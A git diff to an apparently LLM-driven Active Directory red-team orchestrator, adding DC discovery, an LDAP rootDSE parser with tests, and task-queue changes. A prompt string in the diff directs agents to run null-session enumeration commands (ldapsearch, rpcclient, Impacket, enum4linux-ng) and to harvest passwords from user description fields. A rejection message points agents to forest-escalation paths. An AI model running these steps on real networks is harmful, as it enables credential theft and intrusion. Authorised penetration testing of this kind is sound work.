diff --git a/ares-cli/src/orchestrator/bootstrap.rs b/ares-cli/src/orchestrator/bootstrap.rs
index bee94e47..7b3ae071 100644
--- a/ares-cli/src/orchestrator/bootstrap.rs
+++ b/ares-cli/src/orchestrator/bootstrap.rs
@@ -8,11 +8,12 @@ use crate::orchestrator::config::OrchestratorConfig;
 use crate::orchestrator::dispatcher::Dispatcher;
 use crate::orchestrator::task_queue::TaskQueue;
 
-/// Probe target IPs on port 88 (Kerberos) then 389 (LDAP) to find a real DC.
-/// Returns the first IP that accepts a TCP connection within 500ms.
-pub(crate) async fn probe_dc_port(ips: &[String]) -> Option<String> {
-    for port in [88u16, 389] {
-        for ip in ips {
+/// Probe ALL target IPs on ports 88 (Kerberos) and 389 (LDAP) to find every DC.
+/// Returns all IPs that accept a TCP connection within 500ms on either port.
+pub(crate) async fn probe_all_dcs(ips: &[String]) -> Vec<String> {
+    let mut dc_ips = Vec::new();
+    for ip in ips {
+        for port in [88u16, 389] {
             let addr = format!("{ip}:{port}");
             if let Ok(Ok(_)) = tokio::time::timeout(
                 std::time::Duration::from_millis(500),
@@ -21,11 +22,186 @@
             .await
             {
                 info!(ip = %ip, port = port, "DC probe: port open");
-                return Some(ip.clone());
+                dc_ips.push(ip.clone());
+                break; // Found open port, skip remaining ports for this IP
             }
         }
     }
-    None
+    dc_ips
+}
+
+/// Query a DC's LDAP rootDSE to discover its domain name.
+///
+/// Sends a minimal anonymous LDAP SearchRequest for `defaultNamingContext`,
+/// parses the DN response (e.g. 
`DC=child,DC=contoso,DC=local`), and
+/// converts it to a domain name (`child.contoso.local`).
+///
+/// Returns `None` if the connection fails, the DC doesn't respond, or the
+/// response doesn't contain a parseable `defaultNamingContext`.
+pub(crate) async fn query_dc_domain(ip: &str) -> Option<String> {
+    use tokio::io::{AsyncReadExt, AsyncWriteExt};
+
+    // Pre-built LDAP SearchRequest:
+    //   messageId=1, base="", scope=baseObject, filter=present(objectClass),
+    //   attributes=[defaultNamingContext]
+    #[rustfmt::skip]
+    let ldap_request: &[u8] = &[
+        0x30, 0x3b, // SEQUENCE, length 59
+        0x02, 0x01, 0x01, // INTEGER messageId = 1
+        0x63, 0x36, // APPLICATION[3] SearchRequest, length 54
+        0x04, 0x00, // baseObject = ""
+        0x0a, 0x01, 0x00, // scope = baseObject (0)
+        0x0a, 0x01, 0x00, // derefAliases = neverDeref (0)
+        0x02, 0x01, 0x00, // sizeLimit = 0
+        0x02, 0x01, 0x05, // timeLimit = 5
+        0x01, 0x01, 0x00, // typesOnly = false
+        0x87, 0x0b, // present filter, length 11
+        b'o', b'b', b'j', b'e', b'c', b't', b'C', b'l', b'a', b's', b's',
+        0x30, 0x16, // attributes SEQUENCE, length 22
+        0x04, 0x14, // OCTET STRING, length 20
+        b'd', b'e', b'f', b'a', b'u', b'l', b't', b'N', b'a', b'm', b'i',
+        b'n', b'g', b'C', b'o', b'n', b't', b'e', b'x', b't',
+    ];
+
+    let addr = format!("{ip}:389");
+    let mut stream = match tokio::time::timeout(
+        std::time::Duration::from_millis(1000),
+        tokio::net::TcpStream::connect(&addr),
+    )
+    .await
+    {
+        Ok(Ok(s)) => s,
+        _ => {
+            warn!(ip = %ip, "LDAP rootDSE: connection failed");
+            return None;
+        }
+    };
+
+    if stream.write_all(ldap_request).await.is_err() {
+        return None;
+    }
+
+    let mut buf = vec![0u8; 4096];
+    let n = match tokio::time::timeout(
+        std::time::Duration::from_millis(2000),
+        stream.read(&mut buf),
+    )
+    .await
+    {
+        Ok(Ok(n)) if n > 0 => n,
+        _ => return None,
+    };
+
+    let domain = parse_dn_from_ldap_response(&buf[..n]);
+    if let Some(ref d) = domain {
+        info!(ip = %ip, domain = %d, "LDAP rootDSE: discovered DC domain");
+    } else {
+        warn!(ip = %ip, "LDAP rootDSE: could not parse defaultNamingContext");
+    }
+    domain
+}
+
+/// Parse `defaultNamingContext` DN from raw LDAP response bytes.
+///
+/// Locates the `defaultNamingContext` attribute name, then finds the subsequent
+/// DN value containing `DC=` components and converts it to a domain name.
+///
+/// Uses the BER OCTET STRING length prefix immediately preceding the `DC=`
+/// payload as the authoritative end-of-DN marker. Without this, a printable-byte
+/// scan would happily consume the next BER tag (0x30 SEQUENCE = ASCII '0'),
+/// producing phantom domains like `contoso.local0` that poison downstream state.
+fn parse_dn_from_ldap_response(data: &[u8]) -> Option<String> {
+    let attr_name = b"defaultNamingContext";
+    let pos = data.windows(attr_name.len()).position(|w| w == attr_name)?;
+
+    // After the attribute name, scan forward for "DC=" which starts the DN value
+    let remaining = &data[pos + attr_name.len()..];
+    let dc_pos = remaining
+        .windows(3)
+        .position(|w| w.eq_ignore_ascii_case(b"DC="))?;
+
+    let dn_start = pos + attr_name.len() + dc_pos;
+
+    // Prefer the BER OCTET STRING length prefix (the byte immediately before
+    // `DC=`) for the DN length. Short-form only (high bit clear, non-zero).
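+    // Editor's example of the encoding assumed here: in the byte run
+    // `04 1c 44 43 3d ...` the 0x1c before "DC=" (0x44 0x43 0x3d) is a
+    // short-form length of 28 bytes; a long-form length such as `82 01 00`
+    // (256) has the high bit set in its first byte and is deliberately
+    // not trusted, leaving the fallback scan below to bound the DN.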
+    let mut dn_end = dn_start;
+    if dc_pos > 0 {
+        let length_byte = remaining[dc_pos - 1];
+        if length_byte & 0x80 == 0 && length_byte > 0 {
+            let length = length_byte as usize;
+            if let Some(end) = dn_start.checked_add(length) {
+                if end <= data.len() {
+                    dn_end = end;
+                }
+            }
+        }
+    }
+
+    // Fallback: walk only DN-legal characters (alphanumeric, `=`, `,`, `-`, `.`).
+    // Stops before BER tag bytes (e.g. 0x30) that happen to be ASCII printable.
+    if dn_end == dn_start {
+        dn_end = dn_start;
+        while dn_end < data.len() {
+            let b = data[dn_end];
+            let is_dn_char = b.is_ascii_alphanumeric() || matches!(b, b'=' | b',' | b'-' | b'.');
+            if !is_dn_char {
+                break;
+            }
+            dn_end += 1;
+        }
+    }
+
+    let dn_str = std::str::from_utf8(&data[dn_start..dn_end]).ok()?;
+    dn_to_domain(dn_str)
+}
+
+/// Convert an LDAP DN like `DC=child,DC=contoso,DC=local` to `child.contoso.local`.
+fn dn_to_domain(dn: &str) -> Option<String> {
+    let parts: Vec<&str> = dn
+        .split(',')
+        .filter_map(|component| {
+            let component = component.trim();
+            if component.len() > 3 && component[..3].eq_ignore_ascii_case("DC=") {
+                Some(&component[3..])
+            } else {
+                None
+            }
+        })
+        .collect();
+
+    if parts.is_empty() {
+        return None;
+    }
+    Some(parts.join(".").to_lowercase())
+}
+
+/// Discover all DCs and their domains from target IPs.
+///
+/// 1. Probes all IPs on ports 88/389 to find DCs
+/// 2. Queries each DC's LDAP rootDSE to discover its actual domain
+/// 3. Falls back to `fallback_domain` if LDAP query fails
+///
+/// Returns `Vec<(domain, ip)>` with one entry per unique domain.
+pub(crate) async fn discover_dc_domains(
+    ips: &[String],
+    fallback_domain: &str,
+) -> Vec<(String, String)> {
+    let dc_ips = probe_all_dcs(ips).await;
+    let mut results = Vec::new();
+    let mut seen_domains = std::collections::HashSet::new();
+
+    for ip in &dc_ips {
+        let domain = query_dc_domain(ip)
+            .await
+            .unwrap_or_else(|| fallback_domain.to_lowercase());
+
+        // First DC for each domain wins — skip duplicates (e.g. redundant DCs)
+        if seen_domains.insert(domain.clone()) {
+            results.push((domain, ip.clone()));
+        }
+    }
+
+    results
+}
 
 /// Write initial operation metadata to Redis so workers can discover the operation.
@@ -144,11 +320,43 @@ pub(crate) async fn dispatch_initial_recon(
         let payload = serde_json::json!({
             "target_ip": ip,
             "domain": domain,
+            "technique": "user_enumeration",
             "techniques": ["user_enumeration"],
             "null_session": true,
+            "instructions": concat!(
+                "Enumerate domain users via UNAUTHENTICATED methods. This is a bootstrap task ",
+                "— we have NO credentials yet. Try these techniques in order:\n\n",
+                "1. Anonymous LDAP bind to enumerate users and their descriptions:\n",
+                "   ldapsearch -x -H ldap://<target_ip> -b 'DC=<domain>,DC=<tld>' ",
+                "'(objectClass=user)' sAMAccountName description userPrincipalName\n\n",
+                "2. RPC null session user enumeration:\n",
+                "   rpcclient -U '' -N <target_ip> -c 'enumdomusers'\n",
+                "   Then for each user: rpcclient -U '' -N <target_ip> -c 'queryuser <rid>'\n\n",
+                "3. Impacket lookupsid.py with anonymous:\n",
+                "   lookupsid.py anonymous@<target_ip> -no-pass -domain-sids\n\n",
+                "4. Impacket GetADUsers.py with anonymous:\n",
+                "   GetADUsers.py -all -dc-ip <target_ip> <domain>/ 2>/dev/null\n\n",
+                "5. enum4linux-ng for comprehensive SMB/RPC enumeration:\n",
+                "   enum4linux-ng -A <target_ip>\n\n",
+                "CRITICAL: Look for passwords in user DESCRIPTION fields! In many AD environments, ",
+                "admins store passwords in the description attribute. For each user found, report ",
+                "the description field content. If a description looks like a password (short string, ",
+                "special chars, etc.), report it as a discovered credential:\n",
+                "  {\"username\": \"samaccountname\", \"password\": \"<password>\", ",
+                "\"domain\": \"<domain>\", \"source\": \"desc_enumeration\"}\n\n",
+                "IMPORTANT: The 'domain' field for credentials and users MUST be the AD domain the user ",
+                "belongs to (look at userPrincipalName suffix, or the domain reported by LDAP/RPC), NOT ",
+                "the local machine name or workgroup. If the target is a DC for 'contoso.local', ",
+                "users belong to 'contoso.local'. Use the 'domain' field from this task's payload ",
+                "as the default domain unless evidence shows otherwise.\n\n",
+                "Also report ALL discovered users in the discovered_users array:\n",
+                "  {\"username\": \"samaccountname\", \"domain\": \"<domain>\", ",
+                "\"source\": \"user_enumeration\"}\n\n",
+                "If the target is not a DC (no LDAP/Kerberos), just report that and complete."
+            ),
         });
         match dispatcher
-            .throttled_submit("recon", "recon", payload, 5)
+            .throttled_submit("recon", "recon", payload, 1)
             .await
         {
             Ok(Some(task_id)) => {
@@ -162,3 +370,142 @@ pub(crate) async fn dispatch_initial_recon(
     count
 }
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn dn_to_domain_child() {
+        assert_eq!(
+            dn_to_domain("DC=child,DC=contoso,DC=local"),
+            Some("child.contoso.local".to_string())
+        );
+    }
+
+    #[test]
+    fn dn_to_domain_root() {
+        assert_eq!(
+            dn_to_domain("DC=contoso,DC=local"),
+            Some("contoso.local".to_string())
+        );
+    }
+
+    #[test]
+    fn dn_to_domain_single_component() {
+        assert_eq!(dn_to_domain("DC=local"), Some("local".to_string()));
+    }
+
+    #[test]
+    fn dn_to_domain_case_insensitive() {
+        assert_eq!(
+            dn_to_domain("dc=CONTOSO,dc=LOCAL"),
+            Some("contoso.local".to_string())
+        );
+    }
+
+    #[test]
+    fn dn_to_domain_with_spaces() {
+        assert_eq!(
+            dn_to_domain("DC=child, DC=contoso, DC=local"),
+            Some("child.contoso.local".to_string())
+        );
+    }
+
+    #[test]
+    fn dn_to_domain_mixed_components() {
+        // DN with OU components should only extract DC parts
+        assert_eq!(
+            dn_to_domain("OU=Users,DC=contoso,DC=local"),
+            Some("contoso.local".to_string())
+        );
+    }
+
+    #[test]
+    fn dn_to_domain_empty() {
+        assert_eq!(dn_to_domain(""), None);
+    }
+
+    #[test]
+    fn dn_to_domain_no_dc() {
+        assert_eq!(dn_to_domain("OU=Users,CN=admin"), None);
+    }
+
+    #[test]
+    fn parse_dn_from_ldap_response_realistic() {
+        // Simulate a response containing the attribute name followed by a BER-encoded value
+        let mut data = Vec::new();
+        data.extend_from_slice(b"\x30\x50\x02\x01\x01\x64\x4b"); // LDAP envelope
+        data.extend_from_slice(b"\x04\x00"); // objectName=""
+        data.extend_from_slice(b"\x30\x45"); // attributes SEQUENCE
+        data.extend_from_slice(b"\x30\x43"); // partial attribute SEQUENCE
+        data.extend_from_slice(b"\x04\x14"); // type OCTET STRING, len 20
+        data.extend_from_slice(b"defaultNamingContext");
+        data.extend_from_slice(b"\x31\x29"); // vals SET, len 41
+        data.extend_from_slice(b"\x04\x27"); // value OCTET STRING, len 39
+        data.extend_from_slice(b"DC=child,DC=contoso,DC=local");
+        data.push(0x00); // null terminator (end of printable range)
+
+        assert_eq!(
+            parse_dn_from_ldap_response(&data),
+            Some("child.contoso.local".to_string())
+        );
+    }
+
+    #[test]
+    fn parse_dn_from_ldap_response_root_domain() {
+        let mut data = Vec::new();
+        data.extend_from_slice(b"\x30\x40\x02\x01\x01\x64\x3b");
+        data.extend_from_slice(b"\x04\x00");
+        data.extend_from_slice(b"\x30\x35\x30\x33");
+        data.extend_from_slice(b"\x04\x14");
data.extend_from_slice(b"defaultNamingContext"); + data.extend_from_slice(b"\x31\x19\x04\x17"); + data.extend_from_slice(b"DC=contoso,DC=local"); + data.push(0x00); + + assert_eq!( + parse_dn_from_ldap_response(&data), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn parse_dn_from_ldap_response_no_attr() { + let data = b"\x30\x10\x02\x01\x01\x04\x0bsomethingElse"; + assert_eq!(parse_dn_from_ldap_response(data), None); + } + + #[test] + fn parse_dn_from_ldap_response_no_dc() { + let mut data = Vec::new(); + data.extend_from_slice(b"\x04\x14"); + data.extend_from_slice(b"defaultNamingContext"); + data.extend_from_slice(b"\x31\x0a\x04\x08"); + data.extend_from_slice(b"OU=Users"); // No DC= in value + data.push(0x00); + + assert_eq!(parse_dn_from_ldap_response(&data), None); + } + + /// Regression: the OCTET STRING value MUST be bounded by its BER length + /// prefix. Without that bound, a printable-byte scan happily consumes the + /// next BER SEQUENCE tag (0x30 = ASCII '0'), producing phantom domains + /// like `contoso.local0` that poison the orchestrator's `domain_controllers` + /// keys and make the completion loop's required-forest set unsatisfiable. + #[test] + fn parse_dn_from_ldap_response_does_not_bleed_into_next_ber_tag() { + let mut data = Vec::new(); + data.extend_from_slice(b"\x04\x14"); + data.extend_from_slice(b"defaultNamingContext"); + data.extend_from_slice(b"\x31\x15\x04\x13"); // SET len 21, OCTET STRING len 19 + data.extend_from_slice(b"DC=contoso,DC=local"); // exactly 19 bytes + data.extend_from_slice(b"\x30\x10"); // next SEQUENCE: tag 0x30 ('0'), len 0x10 + data.extend_from_slice(b"trailingjunk"); + + assert_eq!( + parse_dn_from_ldap_response(&data), + Some("contoso.local".to_string()) + ); + } +} diff --git a/ares-cli/src/orchestrator/callback_handler/dispatch.rs b/ares-cli/src/orchestrator/callback_handler/dispatch.rs index 5384e179..ccf0bb52 100644 --- a/ares-cli/src/orchestrator/callback_handler/dispatch.rs +++ b/ares-cli/src/orchestrator/callback_handler/dispatch.rs @@ -102,6 +102,42 @@ impl OrchestratorCallbackHandler { attack_step: 0, }; + // Pre-check cross-realm so the LLM gets a clear "dead-end" message + // rather than a misleading "queued" when request_lateral silently rejects. + let target_realm = { + let state = self.state.read().await; + state + .hosts + .iter() + .find(|h| h.ip == target_ip) + .and_then(|h| h.hostname.split_once('.').map(|(_, d)| d.to_lowercase())) + }; + if let Some(td) = target_realm { + let cd = domain.to_lowercase(); + if !cd.is_empty() + && cd != td + && !td.ends_with(&format!(".{cd}")) + && !cd.ends_with(&format!(".{td}")) + { + warn!( + target_ip = target_ip, + target_realm = %td, + cred_domain = %cd, + cred_user = username, + technique = technique, + "Rejecting cross-realm lateral from LLM — returning dead-end message" + ); + return Ok(CallbackResult::Continue(format!( + "REJECTED: cross-realm lateral movement ({cd} cred → {td} target at {target_ip}) \ + will not work. Windows strips ExtraSid RID<1000 across forests, and same-realm \ + auth is required for SMB/WMI/PSExec. DO NOT retry this combination with any \ + {technique}/pth_*/smbexec/wmiexec/psexec variant. Instead: dispatch \ + forest_trust_escalation, exploit ESC8/MSSQL/ACL paths to acquire a \ + {td}-realm credential, or pivot via FSP membership." 
+                )));
+            }
+        }
+
         let task_id = dispatcher
             .request_lateral(target_ip, &cred, technique)
             .await?;
diff --git a/ares-cli/src/orchestrator/completion.rs b/ares-cli/src/orchestrator/completion.rs
index 32cc293a..71f6f730 100644
--- a/ares-cli/src/orchestrator/completion.rs
+++ b/ares-cli/src/orchestrator/completion.rs
@@ -102,6 +102,16 @@ pub async fn undominated_forests(state: &SharedState) -> Vec<String> {
     )
 }
 
+/// Redis-authoritative count of red-team tasks still pending completion.
+async fn redis_pending_red_tasks(dispatcher: &Arc<Dispatcher>) -> Result<usize> {
+    let key = ares_core::state::build_key(
+        &dispatcher.config.operation_id,
+        ares_core::state::KEY_PENDING_TASKS,
+    );
+    let mut conn = dispatcher.queue.connection();
+    redis::cmd("HLEN").arg(&key).query_async(&mut conn).await
+}
+
 /// Extract forest root from a domain FQDN.
 ///
 /// For `north.contoso.local` → `contoso.local`
@@ -206,10 +216,42 @@ pub async fn wait_for_completion(
                 None // Continue — waiting for golden ticket
             }
         } else {
-            // Default: continue until all forests are dominated
+            // Default: continue until all forests are dominated,
+            // then allow a post-exploitation grace period for group/ACL/ADCS
+            // enumeration to complete.
             let remaining = undominated_forests(state).await;
             if remaining.is_empty() {
-                Some("all forests dominated")
+                // Grace period: continue for 180s after all forests dominated
+                // to allow post-exploitation automation (group enum, ACL
+                // discovery, ADCS enumeration) to fire and complete.
+                // 180s needed because: automations check on 20-60s intervals,
+                // domain hashes may arrive late, and LLM tasks need time to
+                // complete LDAP queries.
+                let inner = state.read().await;
+                let all_dominated_at = inner.all_forests_dominated_at;
+                drop(inner);
+                if let Some(dominated_at) = all_dominated_at {
+                    let grace = Duration::from_secs(180);
+                    let since = dominated_at.elapsed();
+                    if since >= grace {
+                        Some("all forests dominated (post-exploitation complete)")
+                    } else {
+                        debug!(
+                            remaining_secs = (grace - since).as_secs(),
+                            "All forests dominated — post-exploitation grace period"
+                        );
+                        None // Still in grace period
+                    }
+                } else {
+                    // First time we see all forests dominated — record the timestamp
+                    let mut inner = state.write().await;
+                    inner.all_forests_dominated_at = Some(tokio::time::Instant::now());
+                    drop(inner);
+                    info!(
+                        "All forests dominated — starting 180s post-exploitation grace period"
+                    );
+                    None
+                }
             } else {
                 debug!(
                     undominated = ?remaining,
@@ -303,6 +345,58 @@ pub async fn wait_for_completion(
             }
         }
 
+        // Wait for active red team tasks and deferred queue to drain
+        // before signalling shutdown. Cap at 5 minutes to avoid hanging.
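+        // Timing sketch (illustrative values): with grace = 180s, a run whose
+        // last forest is dominated at time T signals completion no earlier
+        // than T + 180s, and the drain loop below can add at most another 300s.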
+        let red_deadline = tokio::time::Instant::now() + Duration::from_secs(300);
+        loop {
+            if *shutdown_rx.borrow() {
+                info!("Completion monitor interrupted by shutdown while waiting for red team drain");
+                break;
+            }
+
+            if tokio::time::Instant::now() >= red_deadline {
+                warn!("Red team drain deadline reached (5m) — proceeding with shutdown");
+                break;
+            }
+
+            let active_tasks = dispatcher.tracker.total().await;
+            let deferred_tasks = dispatcher.deferred.total_count().await;
+            let redis_pending_tasks = match redis_pending_red_tasks(dispatcher).await {
+                Ok(count) => count,
+                Err(e) => {
+                    warn!(err = %e, "Failed to read pending red task count from Redis");
+                    usize::MAX
+                }
+            };
+
+            if redis_pending_tasks == 0 && deferred_tasks == 0 {
+                if active_tasks != 0 {
+                    warn!(
+                        active_tasks,
+                        "Local active-task tracker is non-zero, but Redis has no pending tasks; treating tracker entries as stale and proceeding with shutdown"
+                    );
+                }
+                info!("All red team tasks drained");
+                break;
+            }
+
+            info!(
+                active_tasks,
+                redis_pending_tasks,
+                deferred_tasks,
+                "Waiting for red team tasks to drain before shutdown..."
+            );
+
+            tokio::select! {
+                _ = tokio::time::sleep(Duration::from_secs(10)) => {}
+                _ = shutdown_rx.changed() => {
+                    if *shutdown_rx.borrow() {
+                        break;
+                    }
+                }
+            }
+        }
+
         // Signal the main loop to stop via Redis so it breaks out of its
         // select! within the next 5-second poll cycle.
         {
diff --git a/ares-cli/src/orchestrator/config.rs b/ares-cli/src/orchestrator/config.rs
index 1b467b58..357790d5 100644
--- a/ares-cli/src/orchestrator/config.rs
+++ b/ares-cli/src/orchestrator/config.rs
@@ -181,7 +181,7 @@ impl OrchestratorConfig {
             .ok()
             .or_else(|| detect_local_ip(target_ips.first().map(|s| s.as_str())));
 
-        let max_concurrent_tasks = parse_env("ARES_MAX_CONCURRENT_TASKS", 8);
+        let max_concurrent_tasks = parse_env("ARES_MAX_CONCURRENT_TASKS", 12);
         let heartbeat_interval_secs = parse_env("ARES_HEARTBEAT_INTERVAL_SECS", 30);
         let heartbeat_timeout_secs = parse_env("ARES_HEARTBEAT_TIMEOUT_SECS", 120);
         let result_poll_interval_ms = parse_env("ARES_RESULT_POLL_INTERVAL_MS", 500);
@@ -189,7 +189,7 @@ impl OrchestratorConfig {
         let deferred_poll_interval_secs = parse_env("ARES_DEFERRED_POLL_INTERVAL_SECS", 10);
         let max_tasks_per_role = parse_env("ARES_MAX_TASKS_PER_ROLE", 3);
         let dispatch_delay_ms = parse_env("ARES_DISPATCH_DELAY_MS", 200);
-        let stale_task_timeout_secs = parse_env("ARES_STALE_TASK_TIMEOUT_SECS", 900);
+        let stale_task_timeout_secs = parse_env("ARES_STALE_TASK_TIMEOUT_SECS", 300);
         let deferred_task_max_age_secs = parse_env("ARES_DEFERRED_TASK_MAX_AGE_SECS", 300);
         let max_deferred_per_type = parse_env("ARES_MAX_DEFERRED_PER_TYPE", 50);
         let max_deferred_total = parse_env("ARES_MAX_DEFERRED_TOTAL", 200);
@@ -338,7 +338,7 @@ mod tests {
         std::env::set_var("ARES_OPERATION_ID", "test-op-1");
         let c = OrchestratorConfig::from_env().unwrap();
         assert_eq!(c.operation_id, "test-op-1");
-        assert_eq!(c.max_concurrent_tasks, 8);
+        assert_eq!(c.max_concurrent_tasks, 12);
         assert_eq!(c.heartbeat_interval, Duration::from_secs(30));
         assert!(c.target_ips.is_empty());
         assert!(c.initial_credential.is_none());
diff --git a/ares-cli/src/orchestrator/deferred.rs b/ares-cli/src/orchestrator/deferred.rs
index 48b1b111..0ade788b 100644
--- a/ares-cli/src/orchestrator/deferred.rs
+++ b/ares-cli/src/orchestrator/deferred.rs
@@ -194,6 +194,23 @@ impl DeferredQueue {
         Ok(total_evicted)
     }
 
+    /// Total number of deferred tasks across all type ZSETs.
+    pub async fn total_count(&self) -> usize {
+        let pattern = format!("{}:{}:*", DEFERRED_QUEUE_PREFIX, self.config.operation_id);
+        let mut conn = self.queue_conn();
+        let keys: Vec<String> = scan_keys_async(&mut conn, &pattern).await;
+        let mut total = 0_usize;
+        for key in &keys {
+            let count: usize = redis::cmd("ZCARD")
+                .arg(key)
+                .query_async(&mut conn)
+                .await
+                .unwrap_or(0);
+            total += count;
+        }
+        total
+    }
+
     fn queue_conn(&self) -> redis::aio::ConnectionManager {
         // TaskQueue wraps a ConnectionManager which implements Clone cheaply
         // We access it through an internal method.
diff --git a/ares-cli/src/orchestrator/dispatcher/mod.rs b/ares-cli/src/orchestrator/dispatcher/mod.rs
index 347bb2c9..d6576403 100644
--- a/ares-cli/src/orchestrator/dispatcher/mod.rs
+++ b/ares-cli/src/orchestrator/dispatcher/mod.rs
@@ -69,6 +69,28 @@ impl CredentialInflight {
     }
 }
 
+/// Result of a submission attempt that distinguishes between "deferred and
+/// safely enqueued" vs "dropped due to overflow / no role mapping".
+///
+/// Existing call sites use `throttled_submit` which collapses Deferred and
+/// Dropped into `Ok(None)`. New automations that need to dedup deferred work
+/// should use `throttled_submit_outcome` and only mark dedup on
+/// `Submitted`/`Deferred`, never on `Dropped` (otherwise overflowed tasks are
+/// lost forever and never retried by the deferred drain).
+#[derive(Debug, Clone)]
+pub enum SubmissionOutcome {
+    /// Task is running (LLM agent loop spawned). String is the task_id.
+    Submitted(String),
+    /// Task is in the deferred ZSET; the deferred processor will retry when
+    /// throttler/credential capacity opens up.
+    Deferred,
+    /// Task was lost: the deferred queue was at its per-type cap, or no role
+    /// mapping exists for the task_type/target_role. Caller MUST NOT mark this
+    /// item as dispatched; it will be re-considered on the next automation
+    /// tick when capacity is available.
+    Dropped,
+}
+
 /// Extract `"user@domain"` from a task payload's `credential` field.
 pub fn credential_key_from_payload(payload: &serde_json::Value) -> Option<String> {
     let cred = payload.get("credential")?;
diff --git a/ares-cli/src/orchestrator/dispatcher/submission.rs b/ares-cli/src/orchestrator/dispatcher/submission.rs
index fd6d0acb..a977c511 100644
--- a/ares-cli/src/orchestrator/dispatcher/submission.rs
+++ b/ares-cli/src/orchestrator/dispatcher/submission.rs
@@ -16,7 +16,7 @@ use crate::orchestrator::throttling::ThrottleDecision;
 
 use ares_llm::LoopEndReason;
 
-use super::Dispatcher;
+use super::{Dispatcher, SubmissionOutcome};
 
 impl Dispatcher {
     /// Submit a task with throttle checking. Returns the task_id if submitted,
@@ -28,6 +28,26 @@ impl Dispatcher {
         payload: serde_json::Value,
         priority: i32,
     ) -> Result<Option<String>> {
+        match self
+            .throttled_submit_outcome(task_type, target_role, payload, priority)
+            .await?
+        {
+            SubmissionOutcome::Submitted(id) => Ok(Some(id)),
+            SubmissionOutcome::Deferred | SubmissionOutcome::Dropped => Ok(None),
+        }
+    }
+
+    /// Like `throttled_submit` but returns a `SubmissionOutcome` distinguishing
+    /// "deferred and safely enqueued" from "dropped due to overflow". Use this
+    /// when the caller needs to dedup deferred work without losing tasks that
+    /// got silently dropped on queue overflow.
+    pub async fn throttled_submit_outcome(
+        &self,
+        task_type: &str,
+        target_role: &str,
+        payload: serde_json::Value,
+        priority: i32,
+    ) -> Result<SubmissionOutcome> {
         let decision = self
             .throttler
             .check(task_type, target_role, Some(&payload))
@@ -35,36 +55,14 @@ impl Dispatcher {
 
         match decision {
             ThrottleDecision::Allow => {
-                self.do_submit(task_type, target_role, payload, priority)
+                self.do_submit_outcome(task_type, target_role, payload, priority)
                     .await
             }
             ThrottleDecision::Defer => {
-                let task = DeferredTask {
-                    priority,
-                    enqueue_time: Utc::now().timestamp() as f64,
-                    task_type: task_type.to_string(),
-                    target_role: target_role.to_string(),
-                    payload,
-                    source_agent: "orchestrator".to_string(),
-                };
-                match self.deferred.enqueue(&task).await {
-                    Ok(true) => {
-                        debug!(task_type, target_role, "Task deferred");
-                        Ok(None)
-                    }
-                    Ok(false) => {
-                        debug!(task_type, target_role, "Deferred queue full, task dropped");
-                        Ok(None)
-                    }
-                    Err(e) => {
-                        warn!(err = %e, "Failed to defer task, attempting direct submit");
-                        self.do_submit(task_type, target_role, task.payload, priority)
-                            .await
-                    }
-                }
+                self.enqueue_deferred(task_type, target_role, payload, priority)
+                    .await
             }
             ThrottleDecision::Wait(dur) => {
-                // Sleep and retry once
                 tokio::time::sleep(dur).await;
                 let retry_decision = self
                     .throttler
@@ -72,26 +70,68 @@ impl Dispatcher {
                     .await;
                 match retry_decision {
                     ThrottleDecision::Allow => {
-                        self.do_submit(task_type, target_role, payload, priority)
+                        self.do_submit_outcome(task_type, target_role, payload, priority)
                             .await
                     }
                     _ => {
-                        let task = DeferredTask {
-                            priority,
-                            enqueue_time: Utc::now().timestamp() as f64,
-                            task_type: task_type.to_string(),
-                            target_role: target_role.to_string(),
-                            payload,
-                            source_agent: "orchestrator".to_string(),
-                        };
-                        let _ = self.deferred.enqueue(&task).await;
-                        Ok(None)
+                        self.enqueue_deferred(task_type, target_role, payload, priority)
+                            .await
                    }
                 }
             }
         }
     }
 
+    async fn enqueue_deferred(
+        &self,
+        task_type: &str,
+        target_role: &str,
+        payload: serde_json::Value,
+        priority: i32,
+    ) -> Result<SubmissionOutcome> {
+        let task = DeferredTask {
+            priority,
+            enqueue_time: Utc::now().timestamp() as f64,
+            task_type: task_type.to_string(),
+            target_role: target_role.to_string(),
+            payload,
+            source_agent: "orchestrator".to_string(),
+        };
+        match self.deferred.enqueue(&task).await {
+            Ok(true) => {
+                debug!(task_type, target_role, "Task deferred");
+                Ok(SubmissionOutcome::Deferred)
+            }
+            Ok(false) => {
+                warn!(
+                    task_type,
+                    target_role, "Deferred queue full, task dropped (will retry next tick)"
+                );
+                Ok(SubmissionOutcome::Dropped)
+            }
+            Err(e) => {
+                warn!(err = %e, "Failed to defer task, attempting direct submit");
+                self.do_submit_outcome(task_type, target_role, task.payload, priority)
+                    .await
+            }
+        }
+    }
+
+    /// Submit bypassing the throttle soft/hard cap. Used by automations
+    /// whose tasks are small (single LDAP query) and must not be blocked by
+    /// long-running initial recon. Still routes through `do_submit` which
+    /// respects the per-role semaphore.
+    pub async fn force_submit(
+        &self,
+        task_type: &str,
+        target_role: &str,
+        payload: serde_json::Value,
+        priority: i32,
+    ) -> Result<Option<String>> {
+        self.do_submit(task_type, target_role, payload, priority)
+            .await
+    }
+
     /// Direct submit (bypasses throttle). Returns task_id.
     ///
     /// Routes the task to the Rust LLM agent loop. Prefers `target_role`
@@ -102,11 +142,25 @@ impl Dispatcher {
         task_type: &str,
         target_role: &str,
         payload: serde_json::Value,
-        _priority: i32,
+        priority: i32,
     ) -> Result<Option<String>> {
-        // Prefer the caller-specified target_role (from recommended_agent)
-        // over the static task_type → role mapping. This lets automation
-        // modules like MSSQL route exploits to lateral instead of privesc.
+        match self
+            .do_submit_outcome(task_type, target_role, payload, priority)
+            .await?
+        {
+            SubmissionOutcome::Submitted(id) => Ok(Some(id)),
+            SubmissionOutcome::Deferred | SubmissionOutcome::Dropped => Ok(None),
+        }
+    }
+
+    /// Like `do_submit` but returns a `SubmissionOutcome`.
+    pub async fn do_submit_outcome(
+        &self,
+        task_type: &str,
+        target_role: &str,
+        payload: serde_json::Value,
+        priority: i32,
+    ) -> Result<SubmissionOutcome> {
         let role = ares_llm::tool_registry::AgentRole::parse(target_role)
             .or_else(|| crate::orchestrator::llm_runner::role_for_task_type(task_type));
 
@@ -118,7 +172,7 @@ impl Dispatcher {
                     target_role = target_role,
                     "No LLM role mapping for task type or target role, dropping"
                 );
-                return Ok(None);
+                return Ok(SubmissionOutcome::Dropped);
             }
         };
 
@@ -128,6 +182,7 @@ impl Dispatcher {
             target_role,
             role,
             payload,
+            priority,
         )
         .await
     }
@@ -142,26 +197,39 @@ impl Dispatcher {
